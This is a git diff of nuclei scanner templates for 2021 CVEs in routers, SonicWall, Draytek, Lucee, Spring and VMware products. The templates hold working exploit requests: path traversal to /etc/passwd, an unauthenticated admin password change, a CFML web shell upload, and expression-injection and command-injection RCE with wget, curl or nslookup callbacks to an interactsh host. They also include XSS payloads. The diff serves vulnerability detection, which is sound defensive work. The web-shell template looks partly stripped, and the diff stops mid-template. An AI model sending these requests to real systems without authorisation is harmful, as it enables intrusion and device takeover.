b/nuclei-templates/CVE-2021/CVE-2021-46379.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-46379.yaml rename to nuclei-templates/CVE-2021/CVE-2021-46379.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-46381.yaml b/nuclei-templates/CVE-2021/CVE-2021-46381.yaml new file mode 100644 index 0000000000..0595060487 --- /dev/null +++ b/nuclei-templates/CVE-2021/CVE-2021-46381.yaml @@ -0,0 +1,43 @@ +id: CVE-2021-46381 + +info: + name: D-Link DAP-1620 - Local File Inclusion + author: 0x_Akoko + severity: high + description: D-Link DAP-1620 is susceptible to local file Inclusion due to path traversal that can lead to unauthorized internal files reading [/etc/passwd] and [/etc/shadow]. + impact: | + An attacker can exploit this vulnerability to access sensitive information, such as configuration files or credentials, leading to further compromise of the device or network. + remediation: | + Apply the latest firmware update provided by D-Link to fix the local file inclusion vulnerability. + reference: + - https://drive.google.com/drive/folders/19OP09msw8l7CJ622nkvnvnt7EKun1eCG?usp=sharing + - https://www.dlink.com/en/security-bulletin/ + - https://nvd.nist.gov/vuln/detail/CVE-2021-46381 + - http://packetstormsecurity.com/files/167070/DLINK-DAP-1620-A1-1.01-Directory-Traversal.html + - https://github.com/SYRTI/POC_to_review + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2021-46381 + cwe-id: CWE-22 + epss-score: 0.02202 + epss-percentile: 0.892 + cpe: cpe:2.3:o:dlink:dap-1620_firmware:-:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: dlink + product: dap-1620_firmware + tags: cve2021,cve,lfi,router,packetstorm,dlink + +http: + - method: POST + path: + - "{{BaseURL}}/apply.cgi" + + body: "action=do_graph_auth&graph_code=94102&html_response_message=just_login&html_response_page=../../../../../../../../../../../../../../etc/passwd&log_pass=DummyPass&login_n=admin&login_name=DummyName&tkn=634855349&tmp_log_pass=DummyPass&tmp_log_pass_auth=DummyPass" + matchers: + - type: regex + part: body + regex: + - "root:.*:0:0:" +# digest: 4a0a00473045022100fe20ab019ed58034ee55071247995bdc5687525b011466437637201e0749ff3802205e87f35806ee013166ad43614a8dd7b006b0a6c90e18152dc290cb27cf2cdacf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/cve-2021-20031.yaml b/nuclei-templates/CVE-2021/cve-2021-20031.yaml new file mode 100644 index 0000000000..2dc86669e2 --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-20031.yaml @@ -0,0 +1,37 @@ +id: CVE-2021-20031 + +info: + name: Sonicwall SonicOS 7.0 - Host Header Injection + author: gy741 + severity: medium + description: A Host Header Injection vulnerability may allow an attacker to spoof a particular Host header, allowing the attacker to render arbitrary links that point to a malicious website with poisoned Host header webpages. An issue was discovered in Sonicwall NAS, SonicWall Analyzer version 8.5.0 (may be affected on other versions too). The values of the 'Host' headers are implicitly set as trusted while this should be forbidden, leading to potential host header injection attack and also the affected hosts can be used for domain fronting. This means affected hosts can be used by attackers to hide behind during various other attack + reference: + - https://www.exploit-db.com/exploits/50414 + - https://nvd.nist.gov/vuln/detail/CVE-2021-20031 + metadata: + google-dork: inurl:"auth.html" intitle:"SonicWall" + tags: cve,cve2021,sonicwall,redirect + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-20031 + cwe-id: CWE-601 + +requests: + - raw: + - | + GET / HTTP/1.1 + Host: {{randstr}}.tld + + matchers-condition: and + matchers: + - type: word + words: + - 'https://{{randstr}}.tld/auth.html' + - 'Please be patient as you are being re-directed' + part: body + condition: and + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2021/cve-2021-20038.yaml b/nuclei-templates/CVE-2021/cve-2021-20038.yaml deleted file mode 100644 index 3a7571a379..0000000000 --- a/nuclei-templates/CVE-2021/cve-2021-20038.yaml +++ /dev/null @@ -1,42 +0,0 @@ -id: CVE-2021-20038 - -info: - name: SonicWall SMA100 Stack BoF to Unauthenticated RCE - author: dwisiswant0, jbaines-r7 - severity: critical - description: | - A Stack-based buffer overflow vulnerability in SMA100 - Apache httpd server's mod_cgi module environment variables - allows a remote unauthenticated attacker to potentially - execute code as a 'nobody' user in the appliance. - This vulnerability affected SMA 200, 210, 400, 410 and 500v - appliances firmware 10.2.0.8-37sv, 10.2.1.1-19sv, - 10.2.1.2-24sv and earlier versions. - reference: - - https://attackerkb.com/topics/QyXRC1wbvC/cve-2021-20038/rapid7-analysis - tags: cve,cve2021,overflow,rce,sonicwall - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 - cve-id: CVE-2021-20038 - cwe-id: CWE-787 - -requests: - - raw: - - | - GET /{{prefix_addr}}{{system_addr}};{wget,http://{{interactsh-url}}};{{prefix_addr}}{{system_addr}};{wget,http://{{interactsh-url}}};?{{repeat("A", 518)}} HTTP/1.1 - Host: {{Hostname}} - - attack: clusterbomb - payloads: - prefix_addr: - - "%04%d7%7f%bf%18%d8%7f%bf%18%d8%7f%bf" # stack's top address - system_addr: - - "%08%b7%06%08" # for 10.2.1.2-24sv - - "%64%b8%06%08" # for 10.2.1.1-1[79]sv - - matchers: - - type: word - part: interactsh_protocol # Confirms the HTTP Interaction - words: - - "http" \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-20090.yaml b/nuclei-templates/CVE-2021/cve-2021-20090.yaml similarity index 100% rename from nuclei-templates/CVE-2021/CVE-2021-20090.yaml rename to nuclei-templates/CVE-2021/cve-2021-20090.yaml diff --git a/nuclei-templates/CVE-2021/cve-2021-20091.yaml b/nuclei-templates/CVE-2021/cve-2021-20091.yaml new file mode 100644 index 0000000000..95bdbe5501 --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-20091.yaml @@ -0,0 +1,51 @@ +id: CVE-2021-20091 + +info: + name: Buffalo WSR-2533DHPL2 - Configuration File Injection + author: gy741,pdteam,parth + severity: high + description: | + The web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 do not properly sanitize user input. An authenticated remote attacker could leverage this vulnerability to alter device configuration, potentially gaining remote code execution. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2021-20091 + - https://www.tenable.com/security/research/tra-2021-13 + - https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2 + tags: cve,cve2021,buffalo,firmware,iot + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2021-20091 + +requests: + - raw: + - | + GET /images/..%2finfo.html HTTP/1.1 + Host: {{Hostname}} + Referer: {{BaseURL}}/info.html + + - | + POST /images/..%2fapply_abstract.cgi HTTP/1.1 + Host: {{Hostname}} + Referer: {{BaseURL}}/info.html + Content-Type: application/x-www-form-urlencoded + + action=start_ping&httoken={{trimprefix(base64_decode(httoken), base64_decode("R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7"))}}&submit_button=ping.html&action_params=blink_time%3D5&ARC_ping_ipaddress=127.0.0.1%0AARC_SYS_TelnetdEnable=1&ARC_ping_status=0&TMP_Ping_Type=4 + + matchers-condition: and + matchers: + - type: word + part: header + words: + - "/Success.htm" + + - type: status + status: + - 302 + + extractors: + - type: regex + name: httoken + internal: true + group: 1 + regex: + - 'base64\,(.*?)" border=' \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/cve-2021-20123.yaml b/nuclei-templates/CVE-2021/cve-2021-20123.yaml new file mode 100644 index 0000000000..521afdd869 --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-20123.yaml @@ -0,0 +1,58 @@ +id: CVE-2021-20123 + +info: + name: Draytek VigorConnect 1.6.0-B - Local File Inclusion + author: 0x_Akoko + severity: high + description: | + Draytek VigorConnect 1.6.0-B3 is susceptible to local file inclusion in the file download functionality of the DownloadFileServlet endpoint. An unauthenticated attacker could leverage this vulnerability to download arbitrary files from the underlying operating system with root privileges. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, potentially leading to unauthorized access or information disclosure. + remediation: | + Apply the latest security patches or updates provided by the vendor to fix the LFI vulnerability in Draytek VigorConnect 1.6.0-B. + reference: + - https://www.tenable.com/security/research/tra-2021-42 + - https://nvd.nist.gov/vuln/detail/CVE-2021-20123 + - https://github.com/ARPSyndicate/kenzer-templates + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2021-20123 + cwe-id: CWE-22 + epss-score: 0.03354 + epss-percentile: 0.91162 + cpe: cpe:2.3:a:draytek:vigorconnect:1.6.0:beta3:*:*:*:*:*:* + metadata: + verified: true + max-request: 2 + vendor: draytek + product: vigorconnect + shodan-query: http.html:"VigorConnect" + tags: cve2021,cve,draytek,lfi,vigorconnect,tenable + +http: + - method: GET + path: + - "{{BaseURL}}/ACSServer/DownloadFileServlet?show_file_name=../../../../../../etc/passwd&type=uploadfile&path=anything" + - "{{BaseURL}}/ACSServer/DownloadFileServlet?show_file_name=../../../../../../windows/win.ini&type=uploadfile&path=anything" + + stop-at-first-match: true + + matchers-condition: and + matchers: + - type: word + part: header + words: + - "application/octet-stream" + + - type: regex + part: body + regex: + - "root:.*:0:0:" + - "for 16-bit app support" + condition: or + + - type: status + status: + - 200 +# digest: 490a00463044022062fbdc0055a5e3028d6b0fc1cd8d72136f750008795a0f5fa47bed7b03f7d2ae0220630d19cd162113ec4c1fab558f6170e0f964f3b697b287d62f4807ed37a54c4e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/cve-2021-20124.yaml b/nuclei-templates/CVE-2021/cve-2021-20124.yaml deleted file mode 100644 index 30bd740de0..0000000000 --- a/nuclei-templates/CVE-2021/cve-2021-20124.yaml +++ /dev/null @@ -1,57 +0,0 @@ -id: CVE-2021-20124 - -info: - name: Draytek VigorConnect 6.0-B3 - Local File Inclusion - author: 0x_Akoko - severity: high - description: Draytek VigorConnect 1.6.0-B3 is susceptible to local file inclusion in the file download functionality of the WebServlet endpoint. An unauthenticated attacker could leverage this vulnerability to download arbitrary files from the underlying operating system with root privileges. - impact: | - Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, potential data leakage, and further compromise of the affected system. - remediation: | - Apply the latest security patches or updates provided by Draytek to fix the LFI vulnerability in VigorConnect 6.0-B3. - reference: - - https://www.tenable.com/security/research/tra-2021-42 - - https://www.draytek.com/products/vigorconnect/ - - https://nvd.nist.gov/vuln/detail/CVE-2021-20124 - - https://github.com/ARPSyndicate/kenzer-templates - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2021-20124 - cwe-id: CWE-22 - epss-score: 0.01331 - epss-percentile: 0.85744 - cpe: cpe:2.3:a:draytek:vigorconnect:1.6.0:beta3:*:*:*:*:*:* - metadata: - verified: true - max-request: 2 - vendor: draytek - product: vigorconnect - shodan-query: http.html:"VigorConnect" - tags: cve2021,cve,draytek,lfi,vigorconnect,tenable - -http: - - method: GET - path: - - "{{BaseURL}}/ACSServer/WebServlet?act=getMapImg_acs2&filename=../../../../../../../etc/passwd" - - "{{BaseURL}}/ACSServer/WebServlet?act=getMapImg_acs2&filename=../../../../../../../windows/win.ini" - - stop-at-first-match: true - - matchers-condition: and - matchers: - - type: word - part: header - words: - - "application/octet-stream" - - - type: regex - regex: - - "root:.*:0:0:" - - "for 16-bit app support" - condition: or - - - type: status - status: - - 200 -# digest: 490a0046304402201b3f1f755c121ccb9a251c16ad6e7453fc09afe729910ba0627eaa855d04e7f70220147595c2aad515d0ffa806be04849a7530d35e3b15e3b587f301e54c4b30f9da:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/cve-2021-20158.yaml b/nuclei-templates/CVE-2021/cve-2021-20158.yaml new file mode 100644 index 0000000000..cea4234f03 --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-20158.yaml @@ -0,0 +1,53 @@ +id: CVE-2021-20158 + +info: + name: Trendnet AC2600 TEW-827DRU - Unauthenticated Admin Password Change + author: gy741 + severity: critical + description: Trendnet AC2600 TEW-827DRU version 2.08B01 contains an authentication bypass vulnerability. It is possible for an unauthenticated, malicious actor to force change the admin password due to a hidden administrative command. + reference: + - https://www.tenable.com/security/research/tra-2021-54 + - https://nvd.nist.gov/vuln/detail/CVE-2021-20150 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-20158 + cwe-id: CWE-287 + metadata: + shodan-query: http.html:"TEW-827DRU" + tags: cve,cve2021,trendnet,disclosure,router,intrusive,dos + +requests: + - raw: + - | + POST /apply_sec.cgi HTTP/1.1 + Host: {{Hostname}} + + ccp_act=set&action=tools_admin_elecom&html_response_page=dummy_value&html_response_return_page=dummy_value&method=tools&admin_password=nuclei + - | + POST /apply_sec.cgi HTTP/1.1 + Host: {{Hostname}} + + html_response_page=%2Flogin_pic.asp&login_name=YWRtaW4%3D&log_pass=bnVjbGVp&action=do_graph_auth&login_n=admin&tmp_log_pass=&graph_code=&session_id= + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: body + words: + - 'setConnectDevice' + - 'setInternet' + - 'setWlanSSID' + - 'TEW-827DRU' + condition: and + + - type: word + part: header + words: + - "text/html" + +# Enhanced by cs on 2022/02/25 diff --git a/nuclei-templates/CVE-2021/cve-2021-20167.yaml b/nuclei-templates/CVE-2021/cve-2021-20167.yaml deleted file mode 100644 index e5021fb617..0000000000 --- a/nuclei-templates/CVE-2021/cve-2021-20167.yaml +++ /dev/null @@ -1,32 +0,0 @@ -id: CVE-2021-20167 - -info: - name: Netgear RAX43 - Unauthenticated Command Injection / Authentication Bypass Buffer Overrun via LAN Interface - author: gy741 - severity: critical - description: This vulnerability uses a combination of CVE-2021-20166 and CVE-2021-20167. Netgear RAX43 version 1.0.3.96 contains a command injection and authbypass vulnerability. The readycloud cgi application is vulnerable to command injection in the name parameter. and The URL parsing functionality in the cgi-bin endpoint of the router containers a buffer overrun issue that can redirection control flow of the applicaiton. - reference: - - https://www.tenable.com/security/research/tra-2021-55 - - https://nvd.nist.gov/vuln/detail/CVE-2021-20166 - - https://nvd.nist.gov/vuln/detail/CVE-2021-20167 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 - cve-id: CVE-2021-20167 - cwe-id: CWE-94 - tags: cve,cve2021,netgear,rce,router - -requests: - - raw: - - | - POST /cgi-bin/readycloud_control.cgi?1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111/api/users HTTP/1.1 - Host: {{Hostname}} - - "name":"';$(curl http://{{interactsh-url}});'", - "email":"a@b.c" - - matchers: - - type: word - part: interactsh_protocol - words: - - "http" diff --git a/nuclei-templates/CVE-2021/cve-2021-21234.yaml b/nuclei-templates/CVE-2021/cve-2021-21234.yaml new file mode 100644 index 0000000000..b70c6421a6 --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-21234.yaml @@ -0,0 +1,40 @@ +id: CVE-2021-21234 + +info: + name: Spring Boot Actuator Logview - Directory Traversal + author: gy741,pikpikcu + severity: high + description: spring-boot-actuator-logview in a library that adds a simple logfile viewer as spring boot actuator endpoint. It is maven package "eu.hinsch:spring-boot-actuator-logview". In spring-boot-actuator-logview before version 0.2.13 there is a directory traversal vulnerability. + reference: + - https://blogg.pwc.no/styringogkontroll/unauthenticated-directory-traversal-vulnerability-in-a-java-spring-boot-actuator-library-cve-2021-21234 + - https://github.com/cristianeph/vulnerability-actuator-log-viewer + - https://nvd.nist.gov/vuln/detail/CVE-2021-21234 + tags: cve,cve2021,springboot,lfi,actuator + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N + cvss-score: 7.70 + cve-id: CVE-2021-21234 + cwe-id: CWE-22 + +requests: + - method: GET + path: + - "{{BaseURL}}/manage/log/view?filename=/windows/win.ini&base=../../../../../../../../../../" # Windows + - "{{BaseURL}}/log/view?filename=/windows/win.ini&base=../../../../../../../../../../" # windows + - "{{BaseURL}}/manage/log/view?filename=/etc/passwd&base=../../../../../../../../../../" # linux + - "{{BaseURL}}/log/view?filename=/etc/passwd&base=../../../../../../../../../../" # linux + + matchers-condition: or + matchers: + - type: regex + part: body + regex: + - "root:.*:0:0" + + - type: word + words: + - "bit app support" + - "fonts" + - "extensions" + condition: and + part: body diff --git a/nuclei-templates/CVE-2021/cve-2021-21307.yaml b/nuclei-templates/CVE-2021/cve-2021-21307.yaml new file mode 100644 index 0000000000..53b683b142 --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-21307.yaml @@ -0,0 +1,85 @@ +id: CVE-2021-21307 + +info: + name: Remote Code Exploit in Lucee Admin + author: dhiyaneshDk + severity: critical + description: Lucee Server is a dynamic, Java based (JSR-223), tag and scripting language used for rapid web application development. In Lucee Admin before versions 5.3.7.47, 5.3.6.68 or 5.3.5.96 there is an unauthenticated remote code exploit. This is fixed in versions 5.3.7.47, 5.3.6.68 or 5.3.5.96. As a workaround, one can block access to the Lucee Administrator. + reference: + - https://github.com/lucee/Lucee/security/advisories/GHSA-2xvv-723c-8p7r + - https://github.com/httpvoid/writeups/blob/main/Apple-RCE.md + - https://nvd.nist.gov/vuln/detail/CVE-2021-21307 + tags: cve,cve2021,rce,lucee,adobe + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-21307 + cwe-id: CWE-862 + +requests: + - raw: + - | + POST /lucee/admin/imgProcess.cfm?file=/whatever HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + imgSrc=a + - | + POST /lucee/admin/imgProcess.cfm?file=/../../../context/{{randstr}}.cfm HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + imgSrc= + + + + + + + +
Command:value="#form.cmd#">
Options: value="#form.opts#">
Timeout: value="#form.timeout#" + value="5">
+ + + + + + + +
+        #HTMLCodeFormat(myVar)#
+        
+
+ + + - | + POST /lucee/{{randstr}}.cfm HTTP/1.1 + Host: {{Hostname}} + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 + Content-Type: application/x-www-form-urlencoded + + cmd=id&opts=&timeout=5 + + matchers-condition: and + matchers: + - type: word + words: + - "uid=" + - "gid=" + - "groups=" + part: body + condition: and + + - type: status + status: + - 200 + + extractors: + - type: regex + regex: + - "(u|g)id=.*" \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/cve-2021-21479.yaml b/nuclei-templates/CVE-2021/cve-2021-21479.yaml new file mode 100644 index 0000000000..befe4c3526 --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-21479.yaml @@ -0,0 +1,31 @@ +id: CVE-2021-21479 + +info: + name: SCIMono < v0.0.19 Remote Code Execution + author: dwisiswant0 + severity: critical + reference: https://securitylab.github.com/advisories/GHSL-2020-227-scimono-ssti/ + description: | + In SCIMono before 0.0.19, it is possible for an attacker to inject and + execute java expression compromising the availability and integrity of the system. + tags: cve,cve2021,scimono,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H + cvss-score: 9.10 + cve-id: CVE-2021-21479 + cwe-id: CWE-74 + +requests: + - method: GET + path: + - "{{BaseURL}}/Schemas/$%7B''.class.forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('js').eval('java.lang.Runtime.getRuntime().exec(\"id\")')%7D" + + matchers: + - type: word + words: + - "The attribute value" + - "java.lang.UNIXProcess@" + - "has invalid value!" + - '"status" : "400"' + part: body + condition: and diff --git a/nuclei-templates/CVE-2021/cve-2021-21799.yaml b/nuclei-templates/CVE-2021/cve-2021-21799.yaml new file mode 100644 index 0000000000..1eda609ee0 --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-21799.yaml @@ -0,0 +1,52 @@ +id: CVE-2021-21799 + +info: + name: Advantech R-SeeNet 2.4.12 - Cross-Site Scripting + author: arafatansari + severity: medium + description: | + Advantech R-SeeNet 2.4.12 contains a reflected cross-site scripting vulnerability in the telnet_form.php script functionality. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. + remediation: | + Apply the latest security patches or updates provided by Advantech to mitigate the XSS vulnerability in R-SeeNet 2.4.12. + reference: + - https://talosintelligence.com/vulnerability_reports/TALOS-2021-1270 + - https://nvd.nist.gov/vuln/detail/CVE-2021-21799 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-21799 + cwe-id: CWE-79 + epss-score: 0.83144 + epss-percentile: 0.98156 + cpe: cpe:2.3:a:advantech:r-seenet:2.4.12:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: advantech + product: r-seenet + shodan-query: http.html:"R-SeeNet" + tags: cve2021,cve,xss,r-seenet,advantech + +http: + - method: GET + path: + - "{{BaseURL}}/php/telnet_form.php?hostname=%3C%2Ftitle%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Ctitle%3E" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Telnet " + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 +# digest: 4b0a00483046022100cf3f445ac2523e140ae589eedb4c723a9d60a1d3734ddf47f76c27ceebc054d4022100907ae703851cd94586106cb70d472adad6e98a3ec9113a16e806545245aaf46b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/cve-2021-21801.yaml b/nuclei-templates/CVE-2021/cve-2021-21801.yaml new file mode 100644 index 0000000000..4b163e3861 --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-21801.yaml @@ -0,0 +1,37 @@ +id: CVE-2021-21801 + +info: + name: Advantech R-SeeNet graph parameter - Reflected Cross-Site Scripting (XSS) + author: gy741 + severity: medium + description: This vulnerability is present in device_graph_page.php script, which is a part of the Advantech R-SeeNet web applications. A specially crafted URL by an attacker and visited by a victim can lead to arbitrary JavaScript code execution. + reference: https://talosintelligence.com/vulnerability_reports/TALOS-2021-1272 + tags: cve,cve2021,rseenet,xss,graph + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-21801 + cwe-id: CWE-79 + +requests: + - method: GET + path: + - '{{BaseURL}}/php/device_graph_page.php?graph=%22zlo%20onerror=alert(1)%20%22' + + matchers-condition: and + matchers: + - type: word + words: + - '"zlo onerror=alert(1) "' + - 'Device Status Graph' + part: body + condition: and + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2021/cve-2021-21802.yaml b/nuclei-templates/CVE-2021/cve-2021-21802.yaml new file mode 100644 index 0000000000..28e27e9668 --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-21802.yaml @@ -0,0 +1,37 @@ +id: CVE-2021-21802 + +info: + name: Advantech R-SeeNet device_id parameter - Reflected Cross-Site Scripting (XSS) + author: gy741 + severity: medium + description: This vulnerability is present in device_graph_page.php script, which is a part of the Advantech R-SeeNet web applications. A specially crafted URL by an attacker and visited by a victim can lead to arbitrary JavaScript code execution. + reference: https://talosintelligence.com/vulnerability_reports/TALOS-2021-1272 + tags: cve,cve2021,rseenet,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-21802 + cwe-id: CWE-79 + +requests: + - method: GET + path: + - '{{BaseURL}}/php/device_graph_page.php?device_id=%22zlo%20onerror=alert(1)%20%22' + + matchers-condition: and + matchers: + - type: word + words: + - '"zlo onerror=alert(1) "' + - 'Device Status Graph' + part: body + condition: and + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2021/cve-2021-21816.yaml b/nuclei-templates/CVE-2021/cve-2021-21816.yaml deleted file mode 100644 index 1454d889c9..0000000000 --- a/nuclei-templates/CVE-2021/cve-2021-21816.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: CVE-2021-21816 - -info: - name: D-LINK DIR-3040 - Syslog Information Disclosure - description: An information disclosure vulnerability exists in the Syslog functionality of D-LINK DIR-3040 1.13B03. A specially crafted network request can lead to the disclosure of sensitive information. An attacker can send an HTTP request to trigger this vulnerability. - author: gy741 - severity: medium - reference: https://talosintelligence.com/vulnerability_reports/TALOS-2021-1281 - tags: cve,cve2021,dlink,exposure,router,syslog - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N - cvss-score: 4.30 - cve-id: CVE-2021-21816 - cwe-id: CWE-922 - -requests: - - method: GET - path: - - "{{BaseURL}}/messages" - - matchers-condition: and - matchers: - - type: word - words: - - "syslog:" - - "admin" - - "/etc_ro/lighttpd/www" - part: body - condition: and - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2021/CVE-2021-21975.yaml b/nuclei-templates/CVE-2021/cve-2021-21975.yaml similarity index 100% rename from nuclei-templates/CVE-2021/CVE-2021-21975.yaml rename to nuclei-templates/CVE-2021/cve-2021-21975.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-21985.yaml b/nuclei-templates/CVE-2021/cve-2021-21985.yaml similarity index 100% rename from nuclei-templates/CVE-2021/CVE-2021-21985.yaml rename to nuclei-templates/CVE-2021/cve-2021-21985.yaml diff --git a/nuclei-templates/CVE-2021/cve-2021-22005.yaml b/nuclei-templates/CVE-2021/cve-2021-22005.yaml new file mode 100644 index 0000000000..03f06672dc --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-22005.yaml @@ -0,0 +1,40 @@ +id: CVE-2021-22005 + +info: + name: VMware vCenter Server file upload vulnerability + author: PR3R00T + severity: critical + description: The vCenter Server contains an arbitrary file upload vulnerability in the Analytics service. VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3 base score of 9.8. + reference: + - https://kb.vmware.com/s/article/85717 + - https://www.vmware.com/security/advisories/VMSA-2021-0020.html + - https://core.vmware.com/vmsa-2021-0020-questions-answers-faq + tags: cve,cve2021,vmware,vcenter,upload + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-22005 + cwe-id: CWE-434 + +requests: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + + - | + POST /analytics/telemetry/ph/api/hyper/send?_c&_i=test HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + test_data + + req-condition: true + matchers: + - type: dsl + dsl: + - "status_code_1 == 200" + - "status_code_2 == 201" + - "contains(body_1, 'VMware vSphere')" + - "content_length_2 == 0" + condition: and diff --git a/nuclei-templates/CVE-2021/cve-2021-22053.yaml b/nuclei-templates/CVE-2021/cve-2021-22053.yaml deleted file mode 100644 index e43264cb09..0000000000 --- a/nuclei-templates/CVE-2021/cve-2021-22053.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: CVE-2021-22053 - -info: - name: RCE through SpringEL expressions in Spring Cloud Netflix Hystrix Dashboard < 2.2.10.RELEASE - author: forgedhallpass - severity: high - description: | - Applications using both `spring-cloud-netflix-hystrix-dashboard` and `spring-boot-starter-thymeleaf` expose a way to execute code submitted within the request URI path during the resolution of view templates. - When a request is made at `/hystrix/monitor;[user-provided data]`, the path elements following `hystrix/monitor` are being evaluated as SpringEL expressions, which can lead to code execution. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2021-22053 - - https://github.com/SecCoder-Security-Lab/spring-cloud-netflix-hystrix-dashboard-cve-2021-22053 - - https://tanzu.vmware.com/security/cve-2021-22053 - tags: rce,spring,cve,cve2021 - classification: - cvss-score: 8.8 - cve-id: CVE-2021-22053 - cwe-id: CWE-94 - -requests: - - method: GET - path: - - '{{BaseURL}}/hystrix/;a=a/__${T (java.lang.Runtime).getRuntime().exec("nslookup {{interactsh-url}}")}__::.x/' - - matchers-condition: and - matchers: - - type: status - status: - - 500 - - type: word - part: interactsh_protocol - words: - - "dns" diff --git a/nuclei-templates/CVE-2021/cve-2021-22054.yaml b/nuclei-templates/CVE-2021/cve-2021-22054.yaml deleted file mode 100644 index e96b40f597..0000000000 --- a/nuclei-templates/CVE-2021/cve-2021-22054.yaml +++ /dev/null @@ -1,47 +0,0 @@ -id: CVE-2021-22054 - -info: - name: VMWare Workspace ONE UEM - Server-Side Request Forgery - author: h1ei1 - severity: high - description: VMware Workspace ONE UEM console 20.0.8 prior to 20.0.8.37, 20.11.0 prior to 20.11.0.40, 21.2.0 prior to 21.2.0.27, and 21.5.0 prior to 21.5.0.37 contain a server-side request forgery vulnerability. This issue may allow a malicious actor with network access to UEM to send their requests without authentication and to gain access to sensitive information. - 